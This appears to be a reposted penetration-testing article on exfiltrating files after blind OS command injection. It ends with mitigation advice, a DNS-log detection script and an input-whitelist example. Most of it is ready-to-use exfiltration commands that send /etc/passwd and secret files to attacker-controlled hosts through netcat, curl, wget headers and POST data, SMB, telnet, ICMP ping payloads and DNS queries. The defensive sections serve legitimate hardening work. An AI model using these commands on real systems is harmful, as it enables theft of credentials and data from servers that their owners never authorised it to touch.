Technical analysis: How can attackers use blind injection of system commands to achieve "database theft"?

Source: Internet
Author: User
Tags: how to use ftp


In a penetration test or CTF challenge you may encounter an application that asks the user for text input and passes that input as a parameter to a system command, or to an associated program that runs tasks at the operating system level. If the input is not validated or filtered, the application may be vulnerable to operating system command injection.

Attackers can exploit such an injection vulnerability to execute commands with the application's privileges. In practice we have observed this class of vulnerability in a large number of applications, typically of the following types:

• Applications that send an email to a user-specified address
• Applications that monitor whether enterprise servers are running
• Applications that use third-party tools to transmit reports based on user input

In a penetration test or CTF, once you have confirmed the vulnerability, you will probably start examining areas of interest on the target host, hoping to find the trophy or other useful information, such as:

• the operating system password file
• operating system configuration files
• database files
• application source code

A basic example is to inject the Windows command "type" as the parameter being passed, so that it reads a file on the server and returns its text in the response.

In many cases the command that is already being executed has to be terminated first. Imagine a system-monitoring application that pings an IP address to check whether a host is online; the IP address entered by the user is passed straight through to the underlying system command, as in:

ping -c 5 xxx.xxx.xxx.xxx

If you want to run other commands after the application has run the ping command, an additional command is injected after the user-supplied parameter.

In the earlier example we ran the "type" command and the server returned the file's text in the HTTP response. In real environments the injected command often produces no output in the response at all; this situation is known as "blind operating system command injection".

In this case, how can we still get useful information out? The following sections describe in detail how to transfer files from the host.

NetCat

The first example uses the "Swiss Army knife" netcat. Netcat should be no stranger to you; for many people it remains easy to use even after a long time. Simply put, it is a tool that can read from, write to, or connect over TCP or UDP. If netcat is present on the target server, you can use it to set up a listener and redirect the output of system commands to that listener.

Use the following pipeline to redirect a file to the listener:

nc -l -p {port} < {file/to/extract}

You can then connect to that listener on the target server from your own host, and the standard output is redirected to you. The following shows /etc/passwd being redirected to the host.

If the host runs Windows and a netcat build with similar functionality is present, try the following command:

type {file to extract} | nc -L -p {port}

CURL

cURL is a command-line tool and library for transferring data over multiple protocols, and it is very useful for pulling data out. If the target server has cURL, we can still use it to POST files to a specified server or to transfer them over other protocols such as FTP, SCP, TFTP, or TELNET.

Once you have confirmed an operating system command injection vulnerability, you can use the following command to POST a file to a web server, transferring it over HTTP.

cat /path/to/file | curl -F ":data=@-" http://xxx.xxx.xxx.xxxx:xxxx/test.txt

After running the command you can view the file's content in the server log. If this is done during a penetration test, the web server must also be configured with SSL so that the client's data is not transmitted over the network in the clear. The following shows /etc/passwd content being returned as a request.

cURL can also transfer files over FTP. Again, once an operating system command injection vulnerability is confirmed, the following command uploads a file to an FTP server.

curl -T {path to file} ftp://xxx.xxx.xxx.xxx --user {username}:{password}

The following shows FTP being used to transfer a file from the target server to the FTP server.

Of course, cURL can also be transmitted using other protocols, such as SCP, TFTP, or TELNET, which will not be described here.

WGET

Wget is a free tool for downloading files from the network non-interactively. It supports HTTP, HTTPS, and FTP and can work through an HTTP proxy. "Non-interactive" means that wget keeps running in the background after the user logs out: you can log on, start a wget download, log out, and wget continues in the background until the task completes.

You can also use wget to send a request with a custom header to the server. The format is:

--header='name:value'

This can be used to capture the desired data: put the contents of the file you want to retrieve into the header value.

wget --header="EVIL:$(cat /data/secret/password.txt)" http://xxx.xxx.xxx:xxx

The corresponding effect can be seen in the web server's logs, as shown below.

Backticks can also be used to embed a command's output in the data of the original command. The next example retrieves the /etc/passwd file.

wget --header="evil:`cat /etc/passwd | xargs echo -n`" http://xxx.xxx.xxx:xxxx

Wget can also submit a POST request to our web server, adding string data to the request body with --post-data, or sending a file with --post-file. The commands and their effects are as follows:

wget --post-data exfil=`cat /data/secret/secretcode.txt` http://xxx.xxx.xxx.xxx:xxxx

wget --post-file trophy.php http://xxx.xxx.xxx.xxx:xxxx

SMB

Over SMB you can establish a network share between the target server and your host, share files from the target server, and copy them on the host. The command is:

net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\(unknown).txt

The result is as follows:

TELNET

If a telnet client is present on the remote server, we can use it to transfer a file to a listener on our host with the following command:

telnet xxx.xxx.xxx.xxx {port} < {file to transfer}

The result is as follows:

ICMP

If the target host has been hardened and tools such as netcat, wget, or cURL have been removed, getting data out is harder, but other techniques remain. First have the host ping your machine to check whether ICMP packets are filtered by a firewall. If they are not, and the host runs Linux, the ping -p flag can be used to carry file data inside ICMP echo requests.

First the file is converted to hexadecimal, and the data is then placed in the packet payload, as the example below shows:

cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

In Wireshark we can see that the received packets contain our data.

DNS

Like ping, DNS can also be used to get data out. This time each line of the data is used as the hostname in a DNS query; by monitoring network traffic we can reassemble the packets on our machine to restore the original file. In this instance the following command is submitted to the server as part of our request.

cat /data/secret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done

The result is as follows.

A script can then be used to reassemble the received DNS packets into the original file.
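As a defensive counterpart to the DNS technique above, here is an added example (not from the original article) that reviews DNS query logs for the pattern that technique produces: one client sending many distinct, high-entropy leftmost labels to a single parent domain. The log lines and the domain exfil-test.example are constructed for this example, and the BIND-style query-log format is assumed.

```python
import math
import re
from collections import defaultdict

# Constructed BIND-style query log (not from the article). The last three lines
# mimic a file leaking one line per query, as in the host loop above.
SAMPLE_QUERY_LOG = """\
12-Mar-2024 10:01:02.001 client 10.0.0.5#51000: query: www.example.com IN A + (192.168.107.135)
12-Mar-2024 10:01:03.107 client 10.0.0.5#51001: query: mail.example.com IN A + (192.168.107.135)
12-Mar-2024 10:01:04.210 client 10.0.0.9#52000: query: P4ssw0rd1.exfil-test.example IN A + (192.168.107.135)
12-Mar-2024 10:01:04.311 client 10.0.0.9#52001: query: db_admin_Tr0ub4dor.exfil-test.example IN A + (192.168.107.135)
12-Mar-2024 10:01:04.412 client 10.0.0.9#52002: query: s3cr3t-t0ken-9f8e7d.exfil-test.example IN A + (192.168.107.135)
"""

LOG_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<name>\S+) IN ")

def shannon_entropy(label):
    """Bits per character; dictionary words score low, leaked secrets high."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parse_queries(log_text):
    """Yield (client, leftmost label, parent domain) for each query line."""
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        labels = m.group("name").rstrip(".").split(".")
        if len(labels) < 3:
            continue  # a bare second-level name carries no hostname data
        yield m.group("client"), labels[0], ".".join(labels[-2:])

def find_suspicious(log_text, min_labels=3, min_entropy=2.5):
    """Map (client, parent domain) -> sorted labels for clients that send
    at least min_labels distinct labels, all high-entropy, to one domain."""
    seen = defaultdict(set)
    for client, label, parent in parse_queries(log_text):
        seen[(client, parent)].add(label)
    return {
        key: sorted(labels)
        for key, labels in seen.items()
        if len(labels) >= min_labels
        and all(shannon_entropy(l) >= min_entropy for l in labels)
    }
```

Entropy alone is a weak signal (long legitimate hostnames also score high), so the check only fires when the label count and the entropy condition both hold for one client and one domain.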

 

Protection against the above data theft methods

In this article we have shown several methods of pulling data out of a server. So, how do you prevent such incidents?

1. If possible, avoid using user input as a parameter of an operating system command.
2. All user input should be validated. The best approach is a whitelist: accept only strings known to be valid and reject everything else.
3. Perform regular code reviews and penetration tests to detect application vulnerabilities and fix them quickly. Follow up on the remediation to confirm that the discovered vulnerabilities have actually been fixed.
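As an added example that is not part of the original article, the following Python shows the vulnerable pattern from the ping monitoring application described earlier next to the whitelist validation recommended in point 2: the user value is checked as an IP literal and passed as its own argv element without a shell. The function names are my own.

```python
import ipaddress
import subprocess


def build_ping_unsafe(user_input):
    """Vulnerable pattern: the user's text is glued into a shell command line
    (run with shell=True). '8.8.8.8; cat /etc/passwd' becomes two commands."""
    return "ping -c 5 " + user_input


def validate_ip(user_input):
    """Whitelist check: accept only a syntactically valid IPv4/IPv6 literal
    and return it in canonical form; anything else raises ValueError."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        raise ValueError("rejected input: %r" % user_input) from None


def is_valid_ip(user_input):
    """Boolean wrapper around validate_ip for callers that just need yes/no."""
    try:
        validate_ip(user_input)
        return True
    except ValueError:
        return False


def build_ping_safe(user_input):
    """Hardened form: validated value, its own argv element, no shell."""
    return ["ping", "-c", "5", validate_ip(user_input)]


def run_ping(user_input):
    """Execute the hardened command; shell metacharacters never reach a shell."""
    return subprocess.run(build_ping_safe(user_input), shell=False, check=False).returncode
```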

Web application servers should also be hardened to reduce the impact of application flaws, as follows:

1. Remove unnecessary tools such as cURL, wget, or netcat that can be abused in an attack.
2. Following the principle of least privilege, run web services under low-privileged accounts.
3. Review web application logs periodically to identify attacks from the network; the review interval should be at least once every three days, preferably daily.
4. Tighten control of outbound traffic so that the internal firewall prevents attackers from sending data back to their own servers.
